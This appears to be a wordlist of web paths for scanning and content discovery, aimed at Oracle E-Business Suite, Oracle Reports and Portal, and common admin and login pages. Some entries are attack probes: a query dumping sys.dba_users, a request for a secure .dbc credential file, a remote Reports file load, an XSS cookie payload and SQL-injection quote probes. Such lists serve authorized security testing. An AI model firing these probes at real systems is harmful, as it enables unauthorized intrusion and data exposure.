bmp/mime.types
bmp/README.txt
bmp/sqljdemo.jsp
bmp/setconn.jsp
ptg_upgrade_pkg.log
OA_HTML/oam/weboam.log
webapp/admin/_pages/_bc4jadmin/
_pages/_webapp/_admin/_showpooldetails.java
_pages/_webapp/_admin/_showjavartdetails.java
_pages/_demo/
_pages/_webapp/_jsp/
_pages/_demo/_sql/
/OA_HTML/_pages/
OA_HTML/webtools/doc/index.html
reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
apex/
OA_JAVA/
OA_HTML/
aplogon.html
appdet.html
servlets/weboam/oam/oamLogin
OA_HTML/PTB/mwa_readme.htm
reports/rwservlet
reports/rwservlet/showenv
reports/rwservlet/showmap
reports/rwservlet/showjobs
reports/rwservlet/getjobid7?server=myrep
reports/rwservlet/getjobid4?server=myrep
reports/rwservlet/showmap?server=myserver
pls/portal/owa_util.cellsprint?p_theQuery=select
pls/portal/owa_util.listprint?p_theQuery=select
pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
pls/portal/owa_util.showsource?cname=owa_util
pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
pls/portal/owa_util.signature
pls/portal/HTP.PRINT
pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
pls/portal/PORTAL.wwv_form.genpopuplist
pls/portal/PORTAL.wwv_ui_lovf.show
pls/portal/PORTAL.wwa_app_module.link
pls/portal/PORTAL.wwv_dynxml_generator.show
pls/portal/PORTAL.home
pls/portal/PORTAL.wwv_setting.render_css
pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
pls/portal/SELECT
pls/portal/null
OA_MEDIA/
OA_HTML/META-INF/
OA_HTML/jsp/por/services/login.jsp
OA_HTML/PTB/ICXINDEXBASECASE.htm
OA_HTML/PTB/ECXOTAPing.htm
OA_HTML/PTB/xml_sample1.htm
OA_HTML/jsp/wf/WFReassign.jsp
OA_JAVA/Oracle/
OA_JAVA/servlet.zip
OA_JAVA/oracle/forms/registry/Registry.dat
OA_HTML/oam/
OA_HTML/jsp/
OA_HTML/jsp/fnd/fndversion.jsp
OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
OA_HTML/jsp/fnd/fndhelputil.jsp
install/install.php
_vti_bin/shtml.dll/_vti_rpc
cehttp/trace
cehttp/property/
webdav/index.html
hp-ux/
hp_docs/
hp_docs/cgi-bin/index.cgi
hp_docs/xmltools/
cgi-bin/showuser.cgi
cgi-bin/man2html
status?full=true
rpc.php?q="><script>alert(document.cookie)</script>
db.php?q='&t='
rpc.php?q='&t='
/admin.asp
/admin.aspx
/admin.cfm
/admin.jsp
/admin.php
/admin.php4
/admin.pl
/admin.py
/admin.rb
/admin
/admin-login
/admin-login/
/admin/
/admin/auth.inc
/admin/auth.inc.php
/administrator
/administrator/
/administrator.asp
/administrator.aspx
/administrator.cfm
/administrator.jsp
/administrator.php
/administrator.php4
/administrator.pl
/administrator.py
/administrator.rb
/admnistrator.php3
/auth
/auth/
/auth.inc
/auth.inc.php
/authentication
/authentication/
/backend
/backend/
/cgi-bin/sqwebmail?noframes=1
/cms
/cms/
/confluence/login.vm
/cpanel
/cpanel/
/default.asp
/dotAdmin
/exchange/logon.asp
/gs/admin/
/index.php?u=
/invocactf.php
/login/
/login
/login.asp
/login.aspx
/login.cfm
/login.html
/login.php
/login.php3
/login.php4
/login.jsp
/login.pl
/login.py
/login.rb
/login.vm
/logon.asp
/logon.aspx
/logon.jsp
/logon.php
/logon.php3
/logon.php4
/logon.pl
/logon.py
/logon.rb
/?page=admin.auth.inc
/?page=auth.inc
/?page=auth.inc.php
/phpmyadmin
/phpmyadmin/
/phpmyadmin/index.php
/processwire/
/signin
/signin/
/signin.php?ret=
/typo3
/typo3/
/utilities/TreeView.asp
/webeditor.php
/wp-admin
/wp-admin/
/wp-login.php
/wp-signup.php
/wp-register.php